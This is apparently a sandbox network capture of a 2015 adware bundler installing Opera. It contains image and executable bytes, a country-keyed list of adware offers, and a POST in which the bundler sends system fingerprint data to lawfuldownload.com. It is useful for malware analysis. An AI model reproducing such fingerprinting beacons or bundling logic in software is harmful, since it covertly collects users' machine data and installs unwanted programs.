User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found
Server: Apache/2.2.16 (Debian)
Location: hXXp://redir.opera.com/previews/images/twitter_us/sd_264x168.png
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/plain
Content-Length: 26
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789102
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
..............................


GET /previews/images/aliexpress_com/sd_264x168.png HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 17 Dec 2015 12:28:02 GMT
ETag: "6e93a0-2daa-527172761b880"
Content-Type: image/png
Content-Length: 11690
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789125 2871768527
Age: 63
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 185
.PNG........IHDR...................-qIDATx..\..S..~....."..S.@.. 2TfA.
...AP@.:pE.r....#\i.".EdF(. .( c .P.hr27i...Nr.>......Mi-....>..
.......5.._*.@.."..@. .......@ b..D....A .1.."..@. .......@ b..D...@. 
.......@ b..D....A .1.."..@. .......@ b..D..A%b..."..@. .......@ b..D.
...A .1.."..@. .......@ b..."..@. .......@ b..D....?...Q..p....1.@..D8
.......B........ibO...l.h5X./.A!...z.....x....elQG~aK|x...D.....ET..{M
.H..S.z[.".> .D....`;....s........}...b.(.?$..XAy..#^..Cl.X.y<.&
lt;A.f4?.....b.m2.....c['q.y1ae.m..6=..w..Y.Fr......N...m.2.>......
..xIU..@....`?.a9...dM..........3li..,QHngn ....S..6.w.[3..&i.HTp.Ma.F
.....?..sp7...R.[..m....Cj.....HD%.1...@...,.#[..I'....../9.>O.Z..s
k...q.a~.K..1.....j...X.A....?.R...1.G.J0........C.f.G..1....?..-.Y...
..|...9g... F.*.(.*.W....x.B...-.(....[~..5Wu..~;.@;Xp..y.1..1....7.Rn
2$_[.;..6......"...".mS..v.1...t.N`_...b...Q.(..Z.....W.2...j.].o.....
..9.i..oj..5......\Q..N........j9@.[v..z Vw.$.i.O...^5.....2.k..i...m5
\.WXk...d#.o.s:.%%v....GU)".u.?...h.".....?...hi...<N.........#..."
.....N.[B..........k.........m...B......2..>.....1x....G..'..b..3./
z.i....p.am\c.!..=. ...(&1..]..>.3[..^...y.....?o.<...2%..N..K..
...}A.p...S...D.q....`.`......9c;g...xS.n....?....3~e..*.....W....../.
._..>#...S.....A>s"b..ar..b5./_./.A........I......q/..m......k..
.S.^........(,}..e9......&@.p..z.!. .8.....|pi....F.e.`.w4....a../m...
..|<...>....iu....[........P...|...o]......8.. ?L.|....f;..`.8.]
...a.N.^y.lYv.D...v....UK......|.W2.f...gO.-.q..........y.c....UY.
<<< skipped >>>

GET /previews/images/surfeasy/sd_264x168.png HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 17 Dec 2015 12:28:02 GMT
ETag: "14a04d-2480-527172761b880"
Content-Type: image/png
Content-Length: 9344
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789172 2871745429
Age: 127
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 173
.PNG........IHDR.....................sRGB.......$:IDATx.....M.....B$B.
y..".(...*4hV......\.y.^.GO3.g.D.J).B....."..........g_.....k}>..s.
..}....{.5..._.v.....!`.....(.E...a.m2...C@.....!`..!`."...n...fA.5`..
............G..D./.....G..D86.b.$..S......C ..S...X.!.x.LA$..0...p.LA.
cc-.@..0...K..0...0........G..D./.....G..D86.b.$..S......C ..S...X.!.x
.LA$..0...p.LA.cc-.@..0...K..0...0........G..D./.....G..D86.b.$..S....
..C ..S...X.!.x.LA$..0...p.LA.cc-.@..0...K..0...0........G..D./.....G.
.D86.b.$..S......C ..S...X.!.x.LA$..0...p.LA.cc-.@..0...K..0...0......
..G..D./.....G..D86.b.$..S......C ..S...X.!.x.LA$..0...p.LA.cc-.@..0..
.K..0...0........G..D./.....G..D86.b.$..S......C ..S...X.!.x.LA$..0...
p.LA.cc-.@..0...K..0...0........G..D.%..IU..q..V.l.$.........E...u.A2.
....~xa..r.co...~..IlOC &.......c.[...._..\sA'..y.\.......S.e...d.O..j
...@........'iw@]..h.|.....F..\'k.. ?l.Y...e.R;I...J..{......E.<.z.
.7...e.._... d........X."Rv...g..R.z..W{w.......[G.yNk4...@l..../.=*..
..Ozo.S.g.....C.m:...~..4.c......@,........... ...^..K.H.}..y...._~_6.
.PP).Sq9.U...f....A .A.#..O.......w.K....^{..r......../.l.o..A>.b.|
..2.1. i\o/.....[...9Z69...W.>J.`.jVC.6.,....2;.....X...[...-.v ..:
.\_.M..........X.....#.5...o.'r...H..jK.:{......4#......*./-..*'..M_..
.N......~......y.e....... ZT...I*.VF..)!k.m....sm....].<L..B.@.,...
wN).F........o.....-=;7.^G6We..@.2b%K. ......:....O5....z.*....R..o*..
.z...&{o.D...)...VO..........>/_.^...$.G..e.j.h.=..Z.d *.r)Ur......
...:...Z'...L.b...9W...."m.....NA4..*.h.q....N.4..l.L...A.m.Rrl.}.
<<< skipped >>>


GET /root.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.globalsign.net
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Date: Sat, 19 Dec 2015 19:25:13 GMT
Content-Type: application/pkix-crl
Content-Length: 649
Connection: keep-alive
Set-Cookie: __cfduid=da3d6eee9a785a74fa435e17c8db338e01450553113; expires=Sun, 18-Dec-16 19:25:13 GMT; path=/; domain=.globalsign.net; HttpOnly
Last-Modified: Wed, 07 Oct 2015 00:00:00 GMT
ETag: "56146080-289"
CF-Cache-Status: HIT
Expires: Wed, 23 Dec 2015 19:25:13 GMT
Cache-Control: public, max-age=345600
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 25757dffc59e2c6c-AMS
0...0..m...0...*.H........0W1.0...U....BE1.0...U....GlobalSign nv-sa1.
0...U....Root CA1.0...U....GlobalSign Root CA..151007000000Z..16011500
0000Z0..0*.........D.....141125000000Z0.0...U.......0*........)E.....1
41125000000Z0.0...U.......0*........ ...h..141125000000Z0.0...U.......
0*........,^.....141125000000Z0.0...U......../0-0...U......20...U.#..0
...`{f.E....P/}..4....K0...*.H.............<.............&..,t...[.
.:.A..*.H..w........=.E.{(-ekb..?.....y....k..e..59B>Z....O`.].`!..
....7....I.^..T..e.[..K.....V.4B.U.B.!........R....... ..07b...j..c.".
.%[..o..i..I..A^......O$..R.2.....v"....*...9...ueET....xz..R.Gm....-.
..r.[..s......;,..`.W...8HTTP/1.1 200 OK..Date: Sat, 19 Dec 2015 19:25
:13 GMT..Content-Type: application/pkix-crl..Content-Length: 649..Conn
ection: keep-alive..Set-Cookie: __cfduid=da3d6eee9a785a74fa435e17c8db3
38e01450553113; expires=Sun, 18-Dec-16 19:25:13 GMT; path=/; domain=.g
lobalsign.net; HttpOnly..Last-Modified: Wed, 07 Oct 2015 00:00:00 GMT.
.ETag: "56146080-289"..CF-Cache-Status: HIT..Expires: Wed, 23 Dec 2015
 19:25:13 GMT..Cache-Control: public, max-age=345600..Accept-Ranges: b
ytes..Server: cloudflare-nginx..CF-RAY: 25757dffc59e2c6c-AMS..0...0..m
...0...*.H........0W1.0...U....BE1.0...U....GlobalSign nv-sa1.0...U...
.Root CA1.0...U....GlobalSign Root CA..151007000000Z..160115000000Z0..
0*.........D.....141125000000Z0.0...U.......0*........)E.....141125000
000Z0.0...U.......0*........ ...h..141125000000Z0.0...U.......0*......
..,^.....141125000000Z0.0...U......../0-0...U......20...U.#..0...`
<<< skipped >>>


GET /favicon.ico HTTP/1.1
Host: VVV.amazon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Date: Sat, 19 Dec 2015 19:25:10 GMT
Server: Server
Last-Modified: Tue, 21 Sep 2010 17:37:41 GMT
ETag: "4486-490c87c5a6340-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent,Avail-Dictionary
Content-Encoding: gzip
Content-Length: 2590
Content-Type: image/x-icon
...........ZMh]E...^.w.n..4...BH..\X....M.I.Z0u......2.IA.B.%o..D.V4i 
n.&DD1Q0]...jC...C...y....../.'.?8.....9...s..9..ae......UO2..c.......
....n...c.].......F.....=-..W.W.=...d..9...P....?<.r........'h.....
..z....S....... ..?p~U....._.....=.........zS...=g.....@.......j..j.f%
..U{F...$97;........... ..a.c..<i......,.$.'w.......B.!...J........
...\i{.3...?.....ox[p................-.9n....Lk..).g#9...?../....\.dKV
@..o.}.W.t...........W.n...o.-`.'z.....O9........mg.Cb..@.Sm.....V....
=._P..:..afh......{P..m.Z,.>`.@.....9WUZC.@.< m..B.....Bk.vs@_..
.......}..]..F...........O..G..J..I.l.....777..........V.k..l..c.O..F.
.=........}.....u..=...w..*.K.s..........|.............1~m2....y;}...n
p.\.2... ..dHB.>XKy.5.6....qu..................L..=Wj.,._.&..c....J
.Tn...._.1...uX..:....E.z......y].9>...C..q;.....!....oT..i1??.....
.H~...;.'..#...._,....-.y..p.@.'..m.....o1.. .#_...(.!^ .bT.........q.
o....j.6..!..%...b.......,........|.d..~L`M..@....Q1.'....../A.}.v....
.L....YE.~...z..}p....gr...a....?..q.{x..Mw2.Q.W&.W...............e..D
...?|....G...........7.......g.8?..j..s.......=h...EP5................
u...G... ..M5e....#.y..w%A..vNLNN..r....r..........P..0....7I..*.s.g..
F~....... <E.@....Z.Nu. ....d..X...b..X.....Z......s..;.>....%..
.z$....@.....H..q=AuZ...2.N..y...cJ.w..? 6.}$.e..........A...~.'\O.=#.
.....A.._............y|...5....T.=.f.w_.."7..I....s......jsT......E...
.E...t....Y....{..cW......KA.v.F....9.e....=.>E..4.....)..d........
F....E..z.r......C..........%.."..<9.X.1.bb.=...O....{.Ok......
<<< skipped >>>


GET /download/bundles.xml?7ec5da77-cfa4-4fe8-ab72-f226421b0f93 HTTP/1.1
User-Agent: WinHttpClient
Host: osdsoft.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 19 Dec 2015 19:23:27 GMT
Content-Type: text/xml
Content-Length: 3404
Last-Modified: Mon, 14 Dec 2015 22:57:31 GMT
Connection: keep-alive
ETag: "566f495b-d4c"
Accept-Ranges: bytes
<countries>...<AE>YellowSend,AnySend2</AE>...<AM&
gt;Amigo</AM>...<AR>Wajam,YellowSend,AnySend2</AR>..
    <AT>Wajam,Wajam1,FlowsurfCB,ElectroLyrics</AT>..    &l
t;AU>MyBestOffersTodayAU,Groover,znuvisiondataremarketer,VuuPC,Elec
troLyrics,PhraseProfessor,AnySend,NoteUp,YellowSend,AnySend2,NoteUp2&l
t;/AU>...<AZ>Amigo</AZ>..    <BE>MyBestOffersToda
yBE,ElectroLyrics,PhraseProfessor,YellowSend,AnySend2</BE>..    
<BR>Wajam,Groover,MyBestOffersTodayBR,VuuPC,PhraseProfessor,AnyS
end,NoteUp,YellowSend,AnySend2</BR>...<BY>Amigo</BY>
..    <CA>Wajam,Groover,MyBestOffersTodayCA,znuvisiondataremarke
ter,VuuPC,Wajam1,ElectroLyrics,PhraseProfessor,AnySend,YellowSend,AnyS
end2,NoteUp2</CA>..    <CH>Wajam,Wajam1,FlowsurfCB,AnySend
2</CH>...<CL>Wajam,AnySend2</CL>...<CO>Wajam,A
nySend2</CO>...<CZ>Seznam</CZ>..    <DE>Wajam,
Groover,MyBestOffersTodayDE,VuuPC,Wajam1,FlowsurfCB,BrowserSecurity,El
ectroLyrics,PhraseProfessor,AnySend,NoteUp,YellowSend,AnySend2,NoteUp2
</DE>..    <DK>Wajam,MyBestOffersTodayDK,Wajam1,FlowsurfCB
,ElectroLyrics,AnySend,YellowSend,AnySend2</DK>..    <EG>A
nySend2</EG>..    <ES>Wajam,MyBestOffersTodayES,Wajam1,Flo
wsurfCB,PhraseProfessor,AnySend,YellowSend,AnySend2</ES>...<E
E>AmigoIM</EE>..    <FI>Wajam,MyBestOffersTodayFI,Wajam
1,FlowsurfCB,AnySend</FI>..    <FR>Wajam,Groover,MyBes
<<< skipped >>>


GET /download/get/?id=38979&autoupdate=1&ni=1&stream=stable&utm_source=winnersolution&utm_campaign=1png&utm_medium=pb&niuid=ff49e3dc-070d-4f68-99c4-f83b20733611 HTTP/1.1
User-Agent: Opera NetInstaller/34.0.2036.25
Host: dl.opera.com
Cache-Control: no-cache


HTTP/1.1 302 Found
Date: Sat, 19 Dec 2015 19:24:36 GMT
Server: Apache
Location: hXXp://get.geo.opera.com.global.prod.fastly.net/pub/opera/../.custom/ABTest/win/Opera_34.0.2036.41_Setup.exe
Vary: Accept-Encoding
Content-Length: 354
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://get.geo.opera.com.global.prod.fastly.net/pub/opera/../.cu
stom/ABTest/win/Opera_34.0.2036.41_Setup.exe">here</a>.</p
>.<hr>.<address>Apache Server at dl.opera.com Port 80&l
t;/address>.</body></html>.HTTP/1.1 302 Found..Date: Sa
t, 19 Dec 2015 19:24:36 GMT..Server: Apache..Location: hXXp://get.geo.
opera.com.global.prod.fastly.net/pub/opera/../.custom/ABTest/win/Opera
_34.0.2036.41_Setup.exe..Vary: Accept-Encoding..Content-Length: 354..C
ontent-Type: text/html; charset=iso-8859-1..<!DOCTYPE HTML PUBLIC "
-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>3
02 Found</title>.</head><body>.<h1>Found</h
1>.<p>The document has moved <a href="hXXp://get.geo.opera
.com.global.prod.fastly.net/pub/opera/../.custom/ABTest/win/Opera_34.0
.2036.41_Setup.exe">here</a>.</p>.<hr>.<addres
s>Apache Server at dl.opera.com Port 80</address>.</body&g
t;</html>...



POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.lawfuldownload.com
Content-Length: 578
Connection: Keep-Alive
Cache-Control: no-cache

Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=6FE5DDD064E91F40D31A83BB9FE8886E&Sysid1=6FE5DDD064E91F40D31A83BB9FE8886E&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&ci=14991&cmdl=amisetup9338__14991.exe /s  /ver 1.1.2.41  /s /t /i OperaWW /u http://VVV.lawfuldownload.com/index.php /ci 14991&dprod=19C2FB3DEC385401F6FCF22178334A&exe=amisetup9338__14991&ffver=&i=OperaWW&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFA4AA==&netfs=3&s=Y&tmode=1&ts=1450553036&ver=1.1.2.41
HTTP/1.1 200 OK
Access-Control-Allow-Origin: hXXp://VVV.somauto.com
Content-Type: text/html; charset=UTF-8
Date: Sat, 19 Dec 2015 19:24:00 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
21f1....      ..      ..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0
1 Transitional//EN">.<html>.    <head>.        <meta
 http-equiv="content-type" content="text/html; charset=UTF-8" /> . 
       <title>Installer</title>.        <base href="htt
p://VVV.lawfuldownload.com:80/index.php" />.        <script type
="text/javascript" src="hXXp://cdn1.lawfuldownload.com/V32/amipb.js"&g
t;</script>.        <script type="text/javascript">.      
      var g_amiobj = '', g_ami, g_updb = false, g_close = '0', g_addit
ional_offer_list = '0';.            var g_finish_install_button = '0';
.            var g_popup_install_all = '0';.            var g_eula = '
';.            var g_post1 = '_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_c
id=14991&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=&_brw=ie
&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3';.            var g_
icon = '';.            var g_comps = [], g_pages = [], c, g_curPage = 
-1;.            var g_cid = '14991';.            var g_tid = '';.     
       var g_cc = 'UA';.            var g_lang = 'en';.            var
 g_ip = '194.242.96.218';.            var g_browser = 'ie';.          
  var g_cnt = '89fd8f75782a17bd659e9cffd5715da7';.            var g_ve
r = '1.1.2.41';.            var g_buttonImage = 1;.            var g_t
hanks = 'thankyou.php';.            var g_images = [];.            var
 g_purl = 'hXXp://VVV.lawfuldownload.com:80/pix.php';.            var 
g_skipCats = 0;.            var g_ieVer = '6.0';.            var g
<<< skipped >>>


GET /speeddials/partner/facebook?ab_tests=DNA-45706-2-group:DNA-45706-2 HTTP/1.1
Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found
Server: Apache/2.2.16 (Debian)
Location: hXXp://redir.opera.com/previews/images/facebook_other/sd_264x168.png
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/plain
Content-Length: 26
Date: Sat, 19 Dec 2015 19:25:16 GMT
X-Varnish: 815584886
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
..............................


GET /speeddials/partner/expedia_com?ab_tests=DNA-45706-2-group:DNA-45706-2 HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found
Server: Apache/2.2.16 (Debian)
Location: hXXp://redir.opera.com/previews/images/expedia_com/sd_264x168.png
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/plain
Content-Length: 26
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 815584933
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
..............................


GET /speeddials/partner/product?ab_tests=DNA-45706-2-group:DNA-45706-2 HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found
Server: Apache/2.2.16 (Debian)
Location: hXXp://redir.opera.com/previews/images/product/sd_264x168.png
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/plain
Content-Length: 26
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 815584968
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
..............................


GET /previews/images/yahoo_other/sd_264x168.png HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 17 Dec 2015 12:28:02 GMT
ETag: "26bb43-b96-527172761b880"
Content-Type: image/png
Content-Length: 2966
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 815585012 815521233
Age: 205
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 98
.PNG........IHDR............. C......PLTE.1...................79......
..........36.14.rt....X[.58..........IK....gi.......DG....RT..........
........................QS.Z\....69....`c....BE.ik..........pr.{|.@C..
.....[]./2.......HJ.ln.ce.eg.LN.bd.jl._a.MO.ac.np.y{..................
....WZ.......tv.dg.z|.......03.......8;................<?.......[^.
RU.............VX....25.}..;>.......9<..........~..............i
k................VY..........@B.mp....;=..........\_....TV..........PR
..........MP.NQ.......FI.......|~.......km.......vx....7:....EH.IL.AD.
............uw................OR.......wy....xz....^`.DF..........47..
........JM.......?A.......oq.......KN.]_....>A..........df.........
.............vx....su.{}.............SV.:=.CF.UW._b....Y[.......hj.fh.
GJ..........=@....mo.....$.....lIDATx...G.. .. .....&..K..............
...@L..._5...2k..U.i....q..H..PW@j...c.e.P ...D....G.............a(3H.
!"..@.X.A.,kCem.......N}r.^.#.W......s....sI..$.9..SZ..a.UQ.|...(...J.
.X.&....T..../k.....Z.i...R(..;(-.`W(.J.c'eL..]H..[w.]..Ci..'..Z..za..
....5M.........).......^.z..1hp..!7..vc.R.....~....tu...n....X.$..[.&.
.ZJ6.k.-.1..cS..q...MP..I.B.M.>E.L..lZg.d......Jt;v..$\...D3.c7%},w
....l...b..1...@....L....9]..W*..| oJ0...y..`>6B.r..u..... .^..%...
@A.a.ev..@i."E.[1.Z\..eX...zp..Tq.a. m......@~.E<...J2.{LA.'....@..
J....<C1 ..E.(...R1..ya....@.*............... h..B..........k.....s
..2./..... .AiT.[...........Uhej..........&.]Ac..2[4.(......:>..[..
.F..O...?..S.H`k.......U...)...v......V........Y.v...Y....S.P1-.?f
<<< skipped >>>

GET /previews/images/wallmart_com/sd_264x168.png HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 17 Dec 2015 12:28:02 GMT
ETag: "26b962-1830-527172761b880"
Content-Type: image/png
Content-Length: 6192
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 815585035 815559265
Age: 65
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 22
.PNG........IHDR.....................IDATx....{T....w....Z...H..J.^m..
..Z[}j.(.J..2...".".\qA.* .*.(b ..}..d&3.$.}..If.=.{.L..s.L..:...9.OH.
6.....m.;..(......(.`P...(.AQ.....E..."..E0(.`P...(.AQ.....EQ.....E...
"..E0(.`P...(.AQ.....E..."..E0(.`P.E0(.`P...(.AQ.....E..."..E0(.`P...(
.AQ...(.AQ.....E..."..E0(.`P...(.AQ.....E..."..E0(.".T2..B.^........g.
.EI......tt...*.M.r.../K"D0.I.p \0G:2=....&.........&3.....@.....6:...
....8.(,...9S..n..A0..M..gt.........V.AMn0\...c`.......#......Z....;-|
...JQ.......82M.{:.n.`P.*.u{u..~vZ..5..h9..Ja...W..`....`{.s.T...... z
..?..K....V.;d[.egug.0.!...=...v.m5......E.yI....k..V5..d.....M....\.s
..c.c{.......[O..K..}).;..:."g.....#..g|.m< .....Rx0...CL.*OI..[...
._.%...90eaaJz.../.=.O.4..._j.?v.l...J..r!.z.R2Kc....Q.../8...... ....
.5....Q..Y*..og..c.....p.-10P.R.k...4.w.\H.\W..H..d...c..L.....=.....{
.<.....c.u..!............h............G}.S.E...8q......2....j.o....
Q.~Z..C.....R.{Rxh.c.-....CQk..\4...E......M/..;v.(].,`...W.W.....0k..
/.......Ou.A....W...../.....;...:.5}.#..p..F."y:..??O.-........*$R.":.
.r.P.(Y).O.c....$G.!.......S.k....6{iS..._...(...4...<...K.O...-uw.
......d.C.....mT....Y.v.....'..9\...!...8:..N?"..9..)..&.=........[...
...&vW...3.Z.k.Q:.#.Q.f.<...Z..2.TN.''...FX...L.x0"..lY.. ..'<A.
|..,.i. .w.4..`l.....#.i.X.k...Y..%..h.h..(..w....q...........;....~..
.Rl.mg...%.c...l[m'..9..`6n.H.../E.As0..%.<Q......~..>.%..\.....
.T.D.L9..$>.b I..34....m2 ...N}.............U.a......5....C..uFZ ..
i..wv......:.0....r.a..vw........;.o.....M....;..Yw......i...&D..f
<<< skipped >>>

GET /previews/images/product/sd_264x168.png HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 17 Dec 2015 12:28:02 GMT
ETag: "26b4f6-35d3-527172761b880"
Content-Type: image/png
Content-Length: 13779
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 815585055 815503520
Age: 284
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 310
.PNG........IHDR...................5.IDATx.............`.r(=.. ...b.. 
...b..0.....3..I3.sN[...V....Z...u)-.....b..q.Ee.MD,.."..l.vd.k@..$.&.
.....H...=.&7|.y.'........[..{.......p..z4.q].....m...v.W >. ......
.o..j.l....M...E >. ....0.]apc......6.,.X.h...B...@.*..d.*T.h.....1
.`1........................hx.sD.tDw&...X...MK.....0B...n.>.^....#L
...Mzb....%a%...y<RU.u.tIX.#0.....2s..!.i...a.<.f.]-.O..0..L.^..
...U.U....bU......=.~..'..0N...z8.\.q&.o...Z..g....1.y.j.ha....q......
E...p_Y.!0..l-6..}.%.P.f..c.I......1.3...U`..@..H..].<1.R..a1......
..O./........W_....5.......-..g..a8r ..../......b,.Ho...%.!.(...M.%1..
c ....LhR..U..(.....l...n.?....3S......p.V$..u..*.."............C.....
...c.P&...KX...=%..._.O...... tV.......v..WK...=.. ....u....d......Cy.
...An...,.".[.......|..................k..<.p8.z. ..6q......?.A..
.....&..h....L.J...'pVG..c...s.y.Z.......Gv..~..&.%7!.Ih...&..~...{. .
........bP&......aa....o.vt......5R.I.a.2.}Q.u.e.........&.<..F|.,.
.k/i[....O.$..j.f1(....v...0.7,.[...[.6nYFD8.j....=..A.M.....wwiPo7..W
../.k..2a(..{.....%/....7.u...."..x._%......=IH.E..V 1*w..\.A.0....>
;...[..z....;.. "..sx%M..........~.$..Gv...a.P.T.?w0...C.......b....$J
Tl.s.MX ....G.0n.:...g.P..M...<J$...).@.i..3.R....{K.P..ds..&.....6
'|.....$"..J....".&lJ....w...@.3.l.Mc.P.:..D..K...[..J...]...~...F....
.h=....q....#$w....h........4..^.q.....2.z.oX..8........._: ......R.4.
G...Z..`.....L.J..q..Q..;".8..m......$L..".E.....i......*q..j&..a..j..
...H.$"S.......BN8....a.!7Ag$.....I%...9.@i.....Nq.&....\.='..z...
<<< skipped >>>


GET /opera/stable?utm_source=winnersolution&utm_medium=pb&utm_campaign=1png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: net.geo.opera.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sat, 19 Dec 2015 19:24:24 GMT
Content-Type: application/octet-stream
Connection: keep-alive
Content-Length: 720128
Content-Transfer-Encoding: Binary
Content-disposition: attachment; filename="Opera_NI_stable.exe"
MZ......................@...................................@.........
..!..L.!This program cannot be run in DOS mode....$..........f.s.5.s.5
.s.5..'5.s.5.!?5.s.5.!.5js.5.!.5.s.5K..5.s.5K.05.s.5K.15.s.5.".5.s.5K.
 5.s.5.s.5,r.5.s.5.s.5#..5.s.5#..5[s.5#..5.s.5#.<5.s.5.!;5.s.5.sw5.
